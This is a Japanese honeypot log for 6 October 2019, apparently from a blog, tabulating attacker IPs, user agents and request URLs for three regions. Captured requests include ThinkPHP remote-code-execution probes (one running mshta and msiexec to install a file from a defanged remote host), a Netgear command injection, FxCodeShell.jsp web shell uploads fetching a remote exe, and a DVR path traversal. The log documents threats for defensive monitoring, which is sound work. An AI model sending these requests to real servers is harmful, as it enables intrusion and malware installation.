ハニーポット(仮) 観測記録 2019/10/06分です。
特徴
Region:AP
NetGear製品の脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
phpMyAdminに対するスキャン行為
Gh0stRATのような動き
を確認しました。
Region:US
HiSilicon DVR Devicesの脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
jspファイルを狙ったアクセス
を確認しました。
Region:EU
ThinkPHPの脆弱性を狙うアクセス
を確認しました。
他
アクセス数推移
AP:総アクセス数:40 (前日比:-8)
US:総アクセス数:129 (前日比:+109)
EU:総アクセス数:19 (前日比:-16)
都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。
Region:AP
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 111.11.101.46 | China |
2 | 111.61.77.228 | China |
2 | 122.169.229.236 | India |
1 | 122.224.88.26 | China |
2 | 123.252.218.38 | India |
2 | 14.152.90.89 | China |
2 | 14.185.64.121 | Vietnam |
4 | 148.70.56.154 | China |
2 | 185.31.163.237 | Russia |
2 | 192.186.5.85 | United States |
1 | 2.234.173.57 | Italy |
1 | 2.38.205.58 | Italy |
2 | 254.188.21.177 | - |
4 | 45.40.204.173 | China |
2 | 47.244.5.202 | China |
2 | 58.237.78.166 | South Korea |
2 | 60.216.248.90 | China |
2 | 61.175.240.62 | China |
1 | 66.240.205.34 | United States |
2 | 86.105.81.2 | Republic of Moldova |
1 | 87.197.136.28 | Slovakia |
UserAgent一覧
件数 | UserAgent |
---|---|
2 | - |
2 | curl/7.55.1 |
2 | Go-http-client/1.1 |
3 | Hi |
21 | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1) |
2 | Mozilla/5.0 |
2 | Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0 |
6 | Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | GET | /index.php | HTTP/1.1 |
1 | GET | /LoginPage.do | HTTP/1.1 |
3 | GET | /Pages/login.htm | HTTP/1.1 |
1 | GET | /phpmyadmin/index.php | HTTP/1.1 |
10 | GET | /public/index.php?s=index\/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 | HTTP/1.1 |
1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox&curpath=/¤tsetting.htm=1 | HTTP/1.1 |
10 | GET | /?s=index%2F%5Cthink%5Capp%2Finvokefunction&function=call_user_func_array&vars%5B0%5D=system&vars%5B1%5D%5B%5D=mshta.exe%20vbscript:createobject(\"wscript.shell\").run(\"Cmd.exe%20/c%20for%20/l%20%i%20in%20(1,1,99)%20do%20(Msiexec%20/i%20http://Op[.]Cnazb[.]Xyz/PHP2.jpg%20/Q)\",0)(window.close) | |
2 | GET | /TP/index.php | HTTP/1.1 |
2 | GET | /TP/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 | HTTP/1.1 |
2 | GET | /TP/public/index.php | HTTP/1.1 |
1 | GET | /webdav/ | HTTP/1.1 |
1 | Gh0st\xad | ||
2 | POST | /images.php | HTTP/1.1 |
2 | POST | /TP/index.php?s=captcha | HTTP/1.1 |
1 | PROPFIND | / | HTTP/1.1 |
Region:US
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 168.181.153.17 | Brazil |
1 | 172.104.242.173 | United States |
6 | 188.156.84.49 | Hungary |
1 | 190.129.162.66 | Bolivia |
1 | 220.200.159.252 | China |
1 | 221.191.47.215 | Japan |
4 | 223.113.12.238 | China |
1 | 23.95.82.42 | United States |
1 | 43.226.152.51 | China |
1 | 45.134.146.16 | Germany |
10 | 49.235.56.52 | China |
101 | 68.183.201.217 | United States |
UserAgent一覧
件数 | UserAgent |
---|---|
2 | - |
1 | Go-http-client/1.1 |
6 | Hi |
1 | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) |
4 | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1) |
1 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; The World) |
4 | Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1) |
101 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36 |
9 | Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | - | ||
1 | GET | /elrekt.php | HTTP/1.1 |
1 | GET | /FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fky[.]dfg45dfg45[.]best/download.exe | HTTP/1.1 |
1 | GET | /html/public/index.php | HTTP/1.1 |
1 | GET | http://www[.]google[.]com/ | HTTP/1.0 |
1 | GET | /index.php | HTTP/1.1 |
1 | GET | /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 | HTTP/1.1 |
1 | GET | ../../mnt/custom/ProductDefinition | HTTP |
6 | GET | /Pages/login.htm | HTTP/1.1 |
101 | GET | /phpmyadmin/ | HTTP/1.1 |
1 | GET | /public/index.php | HTTP/1.1 |
4 | GET | /public/index.php?s=index\/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 | HTTP/1.1 |
1 | GET | /thinkphp/html/public/index.php | HTTP/1.1 |
1 | GET | /TP/html/public/index.php | HTTP/1.1 |
1 | GET | /TP/index.php | HTTP/1.1 |
1 | GET | /TP/public/index.php | HTTP/1.1 |
1 | HEAD | /FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fky[.]dfg45dfg45[.]best/download.exe | HTTP/1.1 |
1 | POST | /index.php?s=captcha | HTTP/1.1 |
1 | PUT | /FxCodeShell.jsp%20 | HTTP/1.1 |
1 | PUT | /FxCodeShell.jsp::$DATA | HTTP/1.1 |
1 | PUT | /FxCodeShell.jsp/ | HTTP/1.1 |
Region:EU
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 103.207.49.251 | China |
2 | 104.211.216.163 | United States |
1 | 114.242.146.156 | China |
2 | 119.52.111.71 | China |
1 | 185.254.120.20 | Russia |
1 | 185.31.163.237 | Russia |
10 | 49.235.56.52 | China |
1 | 84.51.18.150 | Turkey |
UserAgent一覧
件数 | UserAgent |
---|---|
1 | - |
1 | curl/7.55.1 |
1 | Go-http-client/1.1 |
3 | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1) |
2 | Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0 |
9 | Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) |
2 | python-requests/2.22.0 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | GET | /elrekt.php | HTTP/1.1 |
1 | GET | /html/public/index.php | HTTP/1.1 |
2 | GET | /index.php | HTTP/1.1 |
1 | GET | /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 | HTTP/1.1 |
1 | GET | /phpmyadmin | HTTP/1.1 |
1 | GET | /phpmyadmin/ | HTTP/1.1 |
1 | GET | /phpmyadmin/index.php | HTTP/1.1 |
1 | GET | /public/index.php | HTTP/1.1 |
3 | GET | /public/index.php?s=index\/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 | HTTP/1.1 |
1 | GET | /thinkphp/html/public/index.php | HTTP/1.1 |
1 | GET | /TP/html/public/index.php | HTTP/1.1 |
1 | GET | /TP/index.php | HTTP/1.1 |
1 | GET | /TP/public/index.php | HTTP/1.1 |
1 | POST | /images.php | HTTP/1.1 |
1 | POST | /index.php?s=captcha | HTTP/1.1 |
1 | \x03 |